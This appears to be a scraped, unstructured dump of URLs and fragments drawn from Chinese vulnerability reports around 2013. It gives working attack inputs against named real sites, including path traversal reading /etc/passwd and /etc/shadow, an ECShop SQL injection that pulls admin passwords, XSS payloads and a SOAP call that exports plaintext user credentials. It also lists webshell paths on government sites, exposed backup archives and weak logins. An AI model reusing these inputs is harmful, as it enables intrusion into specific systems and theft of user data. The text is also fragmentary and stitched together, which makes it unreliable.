http://www.mrtdephoto.net/index/wjb/main.jsp www.mrtdephoto.net/sysuser/city_selzxd.action http://changyan.sohu.com/manage?isvId=389&goal=getCode http://changyan.sohu.com/audit/toAuditByTopic?id=27934871 http://changyan.sohu.com/audit/blackListDel?id=3273¤tPage=1&orderBy=82&keyword= http://changyan.sohu.com/audit/illegalWordDel?id=25445¤tPage=1&orderBy=&keyword= http://changyan.sohu.com/audit/auditedByTopic?id=27934871 http://changyan.sohu.com/audit/toAuditByTopic?id=27934871¤tPage=1 http://changyan.sohu.com/audit/deletedByTopic?id=27934871 http://fuyanjie.com/admin/login http://www.mailsina.com/wwwroot.zip http://wsyc.lqwang.com/admin/ www2.pbx010.com http://www.cifnews.com/Contribute http://etax.sdds.gov.cn/etax2006/public/jsp/PUBLISH.jsp?TZLSH={Oracle注射点 http://jis.sdds.gov.cn/jis/service,其中receivews服务的exportXmlUser操作可以导出所有用户明文信息,包括用户登录名和密码。 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:web="http://webservice.blf.hanweb.com soapenv:Header/ soapenv:Body web:exportXmlUser soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string web:exportXmlUser soapenv:Body soapenv:Envelope http://sunzhaopin.sinosig.com/ygbxHr/StaticPageActionDef!personvalue.action http://about.sinosig.com/product_productList.action?tag=1&id=269&flag=email http://product.sinosig.com/product_prdtList.action?RankTag=5 http://paycar.sinosig.com/quote_quote.action?id=1543 http://gift.sinosig.com/product_productList.action?tag=1&id=268&flag=mobile http://mana.gaitu.com/FCKeditor/editor/filemanager/upload/test.html http://www.gaitu.com/connn.aspx http://www.gdca.gov.cn/ http://www.gdca.gov.cn/site/24.rar http://job.aku.edu.cn/bbs.asp?id=7980 http://www.jimuu.com/ http://www.jimuu.com/search.html?kw=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E http://career.oppo.com/?q=about/happydetail&id=40 ang:123456 tester:testtest encap:Ethernet F1:CC:05 MTU:1500 txqueuelen:1000 http://pop.pcpop.com/forum.php http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://maillist.chinabyte.com/mail/common/subscribe!subscribeTemps.do Post:mailGroupID http://wap.cc369.cn/downloadProduct?product.systemsID=3 url:http://hodbuy20.shopex.cn/shopadmin/index.php?ctl=passport&act=login&sess_id=1 http://vs.52pk.com/event/groups/26/53/142?kword=88952634 http://218.21.128.211:90/a.rar http://navi.nlc.gov.cn:8080/newspaper_navi/details.jsp?id=1832 http://srsp.nlc.gov.cn/publish/out/DetailDownload.jsp?command=4ae09f94279964c40127a77266140004 http://res3.nlc.gov.cn/rocbook/detail.jsp?bookid=01jh000271 http://navi.nlc.gov.cn/fileadmin http://www.pzhcoal.com/show.asp?id=1785 http://www.ecshop.cn/respond.php?code=alipay&subject=0&out_trade_no=%00%27%20and%20%28select%20*%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20concat%28user_name,password%29%20from%20ecs_admin_user%20limit%201%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20--%20By%20seay http://www.ecshop.com/old/include/config.inc.php https://pmp.shopex.cn/public/adv/000/02/34/85918400.jpg/.php http://mb.shopex.cn/license.txt/.php http://key-service.shopex.cn/images/logo.png/.php http://game.52pk.com/search?keys=88952634 http://211.94.187.231/dcdy/download?path=../../../../../../../../../../etc/passwd http://211.94.187.231/dcdy/download?path=../../../../../../../../../../etc/shadow http://www.nxzwfw.gov.cn/nxsite/upload/images/110916093158.doc URL:http://400.10086.cn/m400/authenticationFailure.do URL:http://csp.m800400.com/portal/portalLogin.action http://i400.m800400.com/sysLoginInit.action http://rates.motel168.com/Mains.aspx?city=beijing&hotel=M10001 http://www.suning.com/emall/gameWin_10052_10051_.html http://www.suning.com/emall/SNGameWinCouponCmd?json={%22score%22:10000,%22gameId%22:%221003%22,%22memberNo%22:%22%22}&_=1377479677076 http://bbs.aili.com/manage_27.php http://smb.tp-link.com.cn/search.asp?keywords=1 http://www.ahpfpc.gov.cn/TPL2007/zzjg.php?name=%D0%FB%BD%CC%D6%D0%D0%C4 http://ldrk.ahpfpc.gov.cn/admin/login.aspx http://yjz.ahpfpc.gov.cn/admin/login.aspx http://60.166.5.50:8010/ http://60.166.5.60:8004/ http://60.166.5.60:8880/ http://serviceshop.lenovo.com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815 http://blog.ccstock.cn/search/index?type=blog&keyword=%27 http://zhibo.job1001.com/ygxq.php?zbid=126 http://appwiz.lenovo.net http://appwiz.lenovo.net/zecmd/zecmd.jsp http://life.sinosig.com/lifeinsurance/psychological/psychological!list.action http://auth.sinosig.com/auth/login_lifeLoginBar.action http://yyclub.sinosig.com/yyclub/activity!detail.action?id=341 http://service.sinosig.com/product_productList.action?tag=1&id=267&flag=email http://university.ruijie.com.cn/ http://university.ruijie.com.cn/journal/fck/CPKX/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/d:/awstats/wwwroot/cgi-bin http://www.labclub.com.cn/ELabClub/Article/UploadDondTai.aspx http://ec0021.ruijie.com.cn/ResumeList.aspx http://support.ruijie.com.cn/info.php http://iservice.lenovomobile.com/ETS/Engineer/ExamPapersw.aspx?paperCode=201202164&chutiType=1&examCode=201202165&startTime=00:46:22&endTime=23:46:25&paperTitle=OP%E5%8A%A9%E7%90%86%E8%80%83%E8%AF%95%E8%AF%95%E5%8D%B7&idencode=201202172&eptype=1&cpid=0 http://rtoct.mspcloud.cn/rtc_client/RTCWebClient/chat.action http://218.80.247.119/m1/login.do http://ideaclub.lenovo.com.cn/club/index.php?m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b http://ah.189.cn/service/electronic/card/init.action http://www.dascomsoft.com/)开发的精品课程建设平台系统存在struts2漏洞,由于很多学校使用该系统,故个人认为影响较大。 http://www.dascomsoft.com/website/cases.aspx列出了300所高校使用该系统。 http://kefu.hujiang.com/feedback/ http://xss.tw/xxx ftp://125.72.125.103 http://admin.eguan.cn/admin.php?mod=login.login&cmd=post http://gifted.edb.gov.hk/BIA/registration/briefing.php?school_name=%27&submit=GO&filtertype=simplesearch http://act.766.com/tougao2/ http://www.icdcxc.com/ http://98.126.53.92:2382/a-admin/admink.asp http://3g.dzwww.com/m/article/content.html http://www.lkpower.com/templates/T_Second/index_150.html http://222.132.***.***:8080/lkoa6/Editor/ewebeditor.htm?id=txtNR&style=coolblue&&savepathfilename=myText3&savepath=../LKUPLOADFILE/dzyjuploadfiles/love.asp/ love.asp/20130826202310486.jpg http://mob.17173.com/news/class/newgame.php?id=1 http://mob.17173.com/news/class/newgame.php?id=1 http://mob.17173.com/news/class/newgame.php?id=1 http://www.crep.com.cn http://www.cerp.com.cn/admin_admin.asp http://www.cr-dengfeng.com http://www.cr-dengfeng.com:8000,协同办公系统一枚 http://caigou.htinns.com/website/supplierportal/jpoconfirm.aspx?objectid=72318&source=~%2fsupplierportal%2fawaitinglist.aspx http://caigou.htinns.com/website/supplierportal/spohistory.aspx?objectid=69552&source=~/supplierportal/pohistorylist.aspx http://caigou.htinns.com/website/supplierportal/jpohistory.aspx?objectid=75958&source=~/supplierportal/pohistorylist.aspx http://caigou.htinns.com/website/supplierportal/jpohistory.aspx?objectid=68202&source=~/supplierportal/pohistorylist.aspx http://www.soso.com/q?w=site%3Ayunying.htinns.com&lr=&sc=web&ch=w.p&num=10&gid=&cin=&site=&sf=0&sd=0&nf=&pg=5 http://yunying.htinns.com/OpenCheck/PraiseList.aspx?hotelid=2001221 http://yunying.htinns.com/OpenCheck/PraiseList.aspx?hotelid=3001601 http://wireless.yun.vip.xunlei.com/update?version=1.0.3.51&product_id=39其中字段version存在注入点 http://shop09.szneiyi.com/JProject/page/com/vip/login.jsp http://www.nctlj.com.cn/mapbuyticket.aspx ftp://116.10.242.186/ http://ask.goodbaby.com/user/question.html http://lelink.lenovo.com.cn/getpwd_dos.php?resetpwd=getpwdbyemail&uid=17399&id=rKgm http://qscd.cofco.com:8080/khsafety/login!doLogin.action http://e-learning.lenovo.com.cn/user/registration/ajax/group/3/shop/2777 http://onboarding.lenovo.com/ http://onboarding.lenovo.com/demo/login.action http://onboarding.lenovo.com/news/detail.php?id=323 http://voice.lenovo.com.cn:80/Video/amember/pic/1/id/2 http://saas.jspark.org.cn/HomeNew/index.aspx http://saas.jspark.org.cn/ScriptResource.axd?d=h4z6_ll8xCq5fkDXNkUv4dzJqNWeEE5Nwp-8BMDmBiQAAAAAAAAAAAAAAAAAAAAA0 http://www.eguan.cn/talk/uplife.php http://218.75.110.139:81/license!getExpireDateOfDays.action http://safe.oupeng.com http://zone.wooyun.org/content/5548,http://drops.wooyun.org/papers/382 http://www.wooyun.org/ofc/open-flash-chart.swf,页面返回“you http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php?module=corptypecount%26type=%26id=2,我们大致可以判断是在 http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php/../ www.wooyun.org http://zone.wooyun.org/content/5429 font-size:18px display:none;},1,,1& ftp://315.sh.cn/ http://fpzj.cq.gov.cn/index.html http://fpzj.cq.gov.cn/FPApp/wbxx/news/list.jsp?id=1 http://ms.lenovo.com/detail.asp?id=18 http://ms.lenovo.com/fwml2.asp?kk=9 http://220.181.152.196/ ftp://220.181.152.196/ http://www.wushu.com.cn/ http://www.71ab.com/SearchCompany.aspx?querytxt=a&province=%E5%8C%97%E4%BA%AC%E5%B8%82 http://blog.safe.renren.com http://blog.safe.renren.com/?author=1 http://blog.safe.renren.com/?author=50 http://blog.safe.renren.com/wp-login.php linhuihua:111111 lv:111111 http://www.cps.com.cn/gongchengjs/show.php?id=272407 http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959270 http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959267 http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959266 http://jhw.lishui.gov.cn/zwxx/xwdt/p020070126602414593398.xls http://www.zixing.gov.cn/comm_front/email/uploadImageFile_do.jsp http://www.xnzwgk.cn/xxgkweb/gkzn.aspx?unit=JF919 http://about.baicai.com/news/view-news.php?nid=98 http://i.youku.com http://www.vans-china.cn http://www.vans-china.cn/manuel/supplier_manuel.htm http://www.pjedu.net/login/CmsSubmit.do http://www.jiangning.gov.cn/login/CmsSubmit.do http://www.pjedu.net/和jeecms的通用命令执行可证明) http://www.17draw.com/Lessons/viewclass?id=49 http://119.254.72.50/ http://119.254.72.50/index.php?doAction=00010001&Step=../../../../../../../../../../etc/passwd%00.jpg http://119.254.72.50/index.php?doAction=00010001&Step=../../../../../../../../../../etc/resolv.conf%00.jpg http://119.254.72.50/index.php?doAction=00010001&Step=../../../../../../../../../../etc/sysconfig/autofs%00.jpg http://220.179.115.68/newsdisp.asp?id=90858 http://www.xnlk.gov.cn/news_more.asp?lm2=90 http://www.xiuning.gov.cn/newsdisp.asp?id=91139 http://www.xnztb.gov.cn/news_more.asp?lm=2 http://www.xnxkz.gov.cn/web.asp?typeid=2111111407 http://www.xntj.gov.cn/newsweb/newsassort.asp?assort_id=74 http://www.xnaixin.cn/item/show.asp?m=116&d=4 http://www.xnczw.gov.cn/news_more.asp?lm=2 http://www.xnbj.gov.cn/news_more.asp?lm=73 http://www.xncgw.gov.cn/news_more.asp?lm=4 http://www.xnzs.gov.cn/showdiary.asp?id=16 http://www.xnhc.gov.cn/news_more.asp?lm2=72 http://www.xnsf.gov.cn/type.asp?typeid=22 http://www.xnswj.gov.cn/news_more.asp?lm2=75 http://www.xnzgh.org/web.asp?typeid=2111111407 http://www.xnhj.gov.cn/news_more.asp?lm2=72 http://www.xnyf.gov.cn/news_more.asp?lm=73 http://www.xzyyey.cn/news_more.asp?lm=73 http://www.xnga.gov.cn/news/list.asp?cat_id=7 ftp://crland.com.hk/ http://login.gaitu.com/findpwd.html http://www.ptsn.net.cn/standard/plan.php?plan_id=89 http://www.ptsn.net.cn/article_new/show_article.php?article_id=jhbbwj_f0136a2c-2480-917f-a841-4df06ba80295 http://jwxt.ecupl.edu.cn/ http://222.72.92.114/ http://hzclub.vanke.com/login.aspx?exit=1 http://cc.vanke.com/html/paymentlpinfo.aspx?id=616 http://lipton-icha.youku.com/ http://data.auto.ifeng.com/price/searchAll.do encap:Ethernet AF:17:12 addr:10.32.24.51 Bcast:10.32.24.255 Mask:255.255.255.0 feaf:1712/64 Scope:Link MTU:1500 packets:14243368527 packets:17554013928 txqueuelen:1000 http://www.tianya.cn/api/tw?method=tweet.ice.insert http://yinshua.gaitu.com/ManaFunc/login.aspx http://support1.lenovo.com.cn:80/ http://yixin.im/api/dlfromsms http://xxx.xxx.xxx.xxx/quick_setup0.asp http://xxx.xxx.xxx.xxx/wan.asp http://xxx.xxx.xxx.xxx/password.asp http://www.cadillac.com.cn/InterFace/DownloadList.aspx?p3=8126&type=&car=7 http://www.bidding.citic.com/ http://product.it.sohu.com/core/vote.php http://123.232.123.23/index.jsp http://www.auxgroup.com/newsdetail.aspx?Nodecode=00020007&Id=5724 http://crm.lzl98.com/ http://mp.gaitu.com/qiye-list.html?k= http://diy.gaitu.com/Content.aspx?id=2335%20and%201=1 http://info.shfg.gov.cn/%283dwuyg55uukszd55tkiet1yk%29/login.aspx?ReturnUrl=%2flogout.aspx%3fReturnUrl%3d%252fDefault.aspx http://weibo.com/find/f?type=2&search=1&comp=%E7%9F%A5%E4%B9%8E&page=1 http://www.csh.edu.cn/unitCode.action http://www.cdce.cn/www.cdce.cn.rar http://msdn.microsoft.com/en-us/library/ms682425.aspx http://zfcg.zgc.gov.cn/backup.rar http://tieba.baidu.com/f?ie=utf-8&kw=贴吧名字&autolike=1 http://www.nongmintv.com/ucenter/reset.php http://zone.wooyun.org/content/674 http://my.zhenpin.com/third_party_login/api/sina_api.php接口,以获取珍品网的认证 http://www.edu11.net/periodical.php?pid=1 http://www.phone366.com/Admin/Login.aspx http://ldxx.baoji.gov.cn/msgShow.php?id=57330 http://kpzl.baoji.gov.cn/Newspage/show.php?id=13548 http://ldxx.baoji.gov.cn/post.php?id=36 www.anxin.net/editor/upload.asp文件上传地址,提交隐藏了,不过应该有大神可以利用吧? www.anxin.net/%E5%8D%87%E7%BA%A7%E8%AF%B4%E6%98%8E.txt配置文件访问。 http://wooyun.org/whitehats/乌云官方 http://g.baofeng.com/login inurl:news.asp?DHID= http://www.xinnet.com/domain/check.do?method=domfloSchres&domainSuffixType=0&prefix=a&suffix=.com http://www.zhihu.com/question/21551410 http://www.zhihu.com/people/s0s0 http://weibo.com/s0s0x00 http://cart.gaitu.com/confirmord.aspx?ptype=y&pid=2174 http://i.gaitu.com/ajaxpage/AjaxOrders.aspx http://yinshua.gaitu.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.hljjx.gov.cn/hljjx/demo!wjdc_login.action http://r.oupeng.com/tmp/users.sql http://www.siminwenhua.com/webadmin/ http://lisniuse.blog.sohu.com/a/home/entry/delete.htm http://www.jiemai-tech.com/admin/infoManage.do http://fg.yicha.cn/front/game_detail.do?objtype=byx&objid=hy1001&site=0&UA=&phone=&YCUID= http://www.zjsports.gov.cn/admin/images/index.jsp/index.jsp http://jy.ccsu.cn http://jy.ccsu.cn/admin/adminlogin.asp ftp://**.**.** http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://www.tssfda.gov.cn/index.html http://chuangxinren.com http://chuangxinren.com http://chuangxinren.com/robots.txt/a.php http://119.188.128.20/ http://365e.sgcam.net/NewsList.aspx?id=34在对id的的传输值没有做任何过滤,直接导入注射漏洞的产生。虽然或许是边缘业务,但是对用户的体验还是不好的 http://app2.gzstats.gov.cn/auth/login.action http://jtsjy.moc.gov.cn:88/indexAction.do http://jtsjy.moc.gov.cn:88 http://onboarding.lenovo.com/news/news.php?callback=json_data&page=1&pageSize=20&c_code=ae http://g.baofeng.com/forget_password www.zbird.com.fastcdn.com www9.zbird.ccgslb.com.cn http://s190.gaitu.com/ http://s190.gaitu.com/psdUpload/JzPsdClientCallback.asmx?op=AdminID www.jiedong.gov.cn http://service.v5shop.com/Help.aspx?id=462 http://www.92xmf.com:80/products.aspx?classid=7 http://union.baofeng.com/login http://119.188.128.7:8000/ http://119.188.128.28/ http://cdnlt.baofeng.com/ https://passport.baidu.com/aclogin.php?queryWord= display:none http://at.db.766.com/search.php?search.php?action=8&start=16&end=30&gwpage=3#gw http://www.user.jqw.com/del.aspx http://bz.5sing.com/down/1916771 http://bz.5sing.com/1916771.html http://drops.wooyun.org/wp-content/themes/GZai/kindeditor/plugins/multiimage/images/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://zone.wooyun.org/upload/avatar/avatar_12_b.jpg http://zone.wooyun.org/content/6252 http://nc.vanke.com/webserver/indexnew.aspx?classid=1 http://read.yunduan.cn/api/app/d?f=../../../../../../../../etc/passwd&v=2 http://lvyou.baidu.com/user/47783f2e03e2d128a581731f http://www.gz3s.cn/admin/left.php http://www.gz3s.cn/admin/addArticle.php http://home2.xywy.com/index.php?type=index&uid=15363020 http://home2.xywy.com/index.php?type=index&uid=15363020 http://www.loess.csdb.cn/pdmp/index.action http://www.loess.csdb.cn/pdmp/shell.jsp http://www.tpabun.csdb.cn/geo/cn/geoDataSetsSearchPage.do http://www.tpabun.csdb.cn/geo/t.jsp http://szkh.gtja.com/kh/Info.aspx?m=20130306133305887755 http://www.epsr.cn/fckedit/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/aspx/connector.aspx http://tixing.qq.com/cgi-bin/jump?url=http://b2.wap.soso.com/zxcvb/forward_direct.jsp?url=9yg1NZ3UVi4-95lmZie1cFAAouspAEmM&type=wap&g_ut=2&login=0&icfa=1301080 http://whitevitality.tudou.com/usercontrols/uc_videosingle.aspx?store_id=5401country=l06&type=M&class=M04 http://tiku.51taoshi.com/nmcHDtouch/index.php/Login/adminlogin http://121.61.118.178/NmcAdmin2/ http://bbs.dlxww.com/home.php http://bbs.dlxww.com/home.php http://wsnj.zgaic.gov.cn/i!index.action http://139.mobzj.com http://www.chuanhui.gov.cn/ http://www.ruijie.com.cn/锐捷网络官网某处存在sql注入漏洞,危害比较大。 http://www.ruijie.com.cn/cysjds/DemandGameModel.aspx?dguid=d7b3fc96-c014-4257-8231-dd9da58da1ad http://www.cgps.ac.cn/index.action http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://club.cntv.cn/reserve/outputiframe/fansandlinks.php?clubid= http://club.cntv.cn/reserve/outputiframe/fansandlinks.php?clubid=14899170 http://www.shanhaiguan.gov.cn/ http://ssports.smgbb.cn/Live/show/id/581614 http://tu.07073.com/services/service.php?m=index&a=share&width=190&cate=66 http://tu.07073.com/services/service.php?m=u&a=album&width=190&home_id=10 http://tu.07073.com/services/service.php?m=index&a=share&width=190 http://supply.zte.com.cn/sscm/ui/web/Application/kxscm/Index.aspx?TYPE=0 https://supply.zte.com.cn/ui/web/application/kx/freight/contracttrans/contracttransinfo.aspx?computerno=f3f9d3eae828f321&contractheaderid=d9b6451285533084&lang=cn&planno=a12f490b376dc1016d0514ef03a1aae4&type=19### https://supply.zte.com.cn/ui/web/Application/kxscm/Freight/FreightFeedback/FeedbackInfoShow.aspx?Flag=1&FreightNoCMS=DFDD0EC28A533F13667BBC1AED113F6B http://analytics.client.letv.com/client/feedback/video6/feedback_show.php http://jingyan.baidu.com/user/npublic?un=orangefishll http://jingyan.baidu.com/域名下分享一篇文章,但是需要get请求才行,测试了一下可以。 http://jingyan.baidu.com/article/preview?eidEnc=0964eca22049fa8285f536cc http://ts.hjenglish.com/subject/enmusic/zt/song2/getdata_review.aspx?id=65543 http://ts.hjenglish.com/subject/enmusic/zt/song2/getdata_review.aspx?id=65543 http://ts.hjenglish.com/subject/enmusic/zt/song2/getdata_review.aspx?id=65543 http://m.hujiang.com/en/p528357/ http://cet.hjenglish.com/yingyu_guanlian/114175/ http://s.hujiang.com/add/17/638 http://bulo.hujiang.com/gongyi/donate/ http://bulo.hujiang.com/app/zt/gongyi/pay_gateway.aspx?donate_id=27107&money=100.0000&donate_num= http://www.fhgt.gov.cn/ http://www.fhgt.gov.cn/shell.php http://www.hyxgt.gov.cn/ http://www.hyxgt.gov.cn/shell.php http://www.bjxgt.gov.cn/ http://www.bjxgt.gov.cn/shell.php http://www.jsgtzy.gov.cn/ http://www.jsgtzy.gov.cn/shell.php http://www.lsgt.gov.cn/ http://www.lsgt.gov.cn/shell.php http://www.lxxgt.gov.cn/ http://www.lxxgt.gov.cn/shell.php http://jxjy.yzrsks.com/login_admin.jsp http://m.baidu.com/ssid=0/from=2001c/bd_page_type=1/uid=428BA8C89C248CFFBA44C5CE9F579198/pu=sz@1320_1003,ta@iphone_2_4.1_1_9.2,usm@0/baiduid=09599FAFC56C1B9A4DDEF52E13B76316/w=0_10_%E6%B6%93%E5%B6%87%E6%99%B1%E7%81%8F%E5%97%98%E6%BD%B5%20%E6%B6%93%E5%B6%85%E5%BA%B7%E6%9D%A9%E5%9B%A7%E5%B9%93%E7%92%87%E8%AF%B2%E6%82%97%E9%8E%B0%EF%BF%BD/t=iphone/l=3/tc?srd=1&dict=20&ua=1&src=http%3A%2F%2Fdouban.com www.ule.com订单查看中已有权限控制,不能越权查看其他用户订单。 http://my.ule.com/usr/addressSave.do http://service.ule.tom.com/api/order/getOrderInfo.do http://s.anyview.net/material/bg.php?style=1 http://ge.07073.com ge.07073.com/uninstall/.svn/text-base/config.php.svn-base http://weather.com.cn/ http://tq121.weather.com.cn/futurelife/view.php?id=765681 http://61.155.159.239:8080/ VERSION:1.2.2 http://zhaoren.idtag.cn/samename/searchName!searchIndex.htm http://114.80.121.11/portal/showcase.php?id=12 http://114.80.121.92/security/index.action http://114.80.121.25/bud/user/index.action http://114.80.121.81/login.action http://cring.118320.com:8081/voice/activity/index.action www.gfan.com http://www.13cr.com/js-0.html Post:search=%27 www.13cr.com http://misc.maxthon.cn/mxbrowser_lang/translation.php?lang=id&page=30 www.gfan.com www.gfan.com http://target/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt http://target/jcms/m_5_9/sendreport/,然后生成报表就看得到了。 http://target/jcms/m_5_e/init/comment/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://target/jcms/m_5_e/init/guestbook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://120.193.9.23/ http://blog.sina.com.cn/u/3636469737 http://www.lesuke.com/front/alipay_authAuthorize.do http://h.lesuke.com/comUserReg_toReg.do http://hnbh.hn-fda.gov.cn/login!login.do http://lib.sx.cn/pcons/front/getDataListByPage.action?siteId=1&channelId=59 http://www.gdfcl.com.cn/gdfcl/into/intolist.action;jsessionid=4CD202A4C5A06EADAC2F8ADF1F8514F3 http://11185.bjpost.com.cn/ep/sysManager/userAction!userLogin.action http://ev.apps.cctv.com/app_ev/program09/newsletter/destroyEmail.jsp?id=7988 http://www.yitour.net/travel/admin/user/login.action http://www.dianning.com/thing/index.action http://www.wooyun.org/bugs/wooyun-2013-035846/trace/c16ee5f89abb5b82d6e09e14c772a9d3 http://meirong.yangtse.com/chanel.php?id=1 http://gevent.kongzhong.com/resurrect/toupgradekey.action http://quiz.astro.ifeng.com/ma/index.php?ac=c¶m=2 http://quiz.astro.ifeng.com/ma/index.php?ac=c¶m=2 http://www.zdgt.gov.cn/public/show.jsp?id=20130830091083 http://www.czjt.gov.cn:81 http://hsj.czjt.gov.cn http://jgz.czjt.gov.cn http://zjc.czjt.gov.cn http://www.jslyjt.gov.cn http://xjc.czjt.gov.cn http://ajc.czjt.gov.cn http://zzc.czjt.gov.cn http://czjc.czjt.gov.cn http://ygc.czjt.gov.cn http://gkc.czjt.gov.cn http://hdc.czjt.gov.cn http://sgz.czjt.gov.cn http://glc.czjt.gov.cn http://cyjt.czjt.gov.cn http://zjz.czjt.gov.cn http://jtysj.changzhou.gov.cn http://czjc.czjt.gov.cn/publicfiles/model/ http://czjc.czjt.gov.cn/publicfiles/model/1.jsp http://czjc.czjt.gov.cn/publicfiles/model/12.htm http://czjc.czjt.gov.cn/publicfiles/m3.htm http://www.czjt.gov.cn/publicfiles/m3.htm http://hsj.czjt.gov.cn/publicfiles/m3.htm http://jgz.czjt.gov.cn/publicfiles/m3.htm http://zjc.czjt.gov.cn/publicfiles/m3.htm http://www.jslyjt.gov.cn/publicfiles/m3.htm http://xjc.czjt.gov.cn/publicfiles/m3.htm http://ajc.czjt.gov.cn/publicfiles/m3.htm http://zzc.czjt.gov.cn/publicfiles/m3.htm http://czjc.czjt.gov.cn/publicfiles/m3.htm http://ygc.czjt.gov.cn/publicfiles/m3.htm http://gkc.czjt.gov.cn/publicfiles/m3.htm http://hdc.czjt.gov.cn/publicfiles/m3.htm http://sgz.czjt.gov.cn/publicfiles/m3.htm http://glc.czjt.gov.cn/publicfiles/m3.htm http://cyjt.czjt.gov.cn/publicfiles/m3.htm http://zjz.czjt.gov.cn/publicfiles/m3.htm http://jtysj.changzhou.gov.cn/publicfiles/m3.htm http://www.952111.com/bankCard/edit.do http://dmb.star-net.cn/ http://dmb.star-net.cn/aspx/searchresult.aspx?keyword=1 http://el.7daysinn.cn:81 http://120.35.11.156:81/,找到相应的配置信息 http://120.35.11.156:81/webresource.axd?d=AqBDlhyQSWwoYB19J3EqwOtkKU2n76etN_OvQfBxOWU1,在审查源码中找; http://120.35.11.156:81/webresource.axd?d=AqBDlhyQSWwoYB19J3EqwOtkKU2n76etN_OvQfBxOWU1 http://120.35.11.156:81/scriptresource.axd?d=lkYlJ3fxLEQaeJv5cHCyhtWuwWkL2J7VJP7lAuhM4WIAAAAAAAAAAAAAAAAAAAAA0 http://xhzhglxt.cirea.org.cn/website/dfxhs_cx_gs.asp?DwID=7297注入点 http://www.21education.com.cn/newsInfo.asp?id=171 http://nba.hupu.com/admin/coach.php http://nba.hupu.com/admin/coach.php http://nba.hupu.com/admin/add_edit_coach.php?option=coach&action=edit&coach_id=11 https://service.allinpay.com/usercenter/user/Main/index.do http://www.cpic.com.cn/life/shouhu/mobile/config.php http://mm.xunlei.com/6house/indexweb.html?t=1&loadurl=http%3A%2F%2Fha.cker.in%2F http://lbc.baidu.com/ http://www.fjcanet.gov.cn:81/unms/login.action mantis:http://mantis.fantong.com/view_all_bug_page.php http://txs.eol.cn/article_page.php?articleid=95550 http://www.yunzuche.com/main.action http://www.fjtzb.org.cn:8000/infoup/user/user!login.action http://srm.lzlj.com.cn/app/pages/login.action http://www.uni-president.com.cn http://www.uni-president.com.cn/ft/admin/11.aspx http://www.chinarma.cn/CRMA/quickWelcome.action http://cgs.ytjj.gov.cn/ytcgs/wswdcgs.action http://greenadsl.com/interceptState/InterceptState_findInterceptState.action http://www.zhaoxiaoshuo.com/my/book_list.php http://nlp.ict.ac.cn/Admin/index.php ns.stats.gov.cn/sns.stats.gov.cn ns.nsa.gov.cn/ns2.nsa.gov.cn http://zhaopin.evideostb.com/admin/login.aspx http://218.22.211.155:7915/ ftp://218.22.211.155 http://218.29.134.77/login/toLoginPage.do http://www.efaka.com/efaka/index.do http://lisniuse2.blog.163.com/ http://218.5.11.78/ http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/services×= http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/passwd×= http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/passwd×= http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/sysctl.conf×= http://support.zte.com.cn/admin/ http://hljdl.hl.sgcc.com.cn/register.aspx http://hljdl.hl.sgcc.com.cn https://ebank.guilinbank.com.cn/jfyMall/pointsaccountplan/buy.do http://cms.jl.sgcc.com.cn http://cms.jl.sgcc.com.cn/site1/templates/2013/09/01/A2B0B4645781461AA35225C62F0D98F9.jsp?o=vLogin http://pqs.epri.sgcc.com.cn/ http://pqs.epri.sgcc.com.cn/db.rar http://pqs.epri.sgcc.com.cn/website.rar http://pqs.epri.sgcc.com.cn/Level_List.aspx?D_ID=5&P_id=35 http://www.dje.ah.sgcc.com.cn http://www.dje.ah.sgcc.com.cn/english/imglist.aspx?nodeid=16 http://bid.ha.sgcc.com.cn http://bid.ha.sgcc.com.cn/upgrade/wooyunxpz.aspx http://www.eb.com.cn/scripts/ajaxnormal1.asp?action=GetHostproduct http://xfyj.sgcc.com.cn/index.action http://211.160.19.243 http://211.160.19.243/vds/analysis/vxinfo?vxtype=66&type=ovx&dateB=1378047782&dateE=1378134182 https://bosp.sgid.sgcc.com.cn/ https://bosp.sgid.sgcc.com.cn/LoginAction.do https://bosp.sgid.sgcc.com.cn/LoginAction.do http://61.183.0.37:8003/ http://www.sjhlcs.com/wwwroot/news-xx.asp?news_id=200912040001&language=&news_action=show 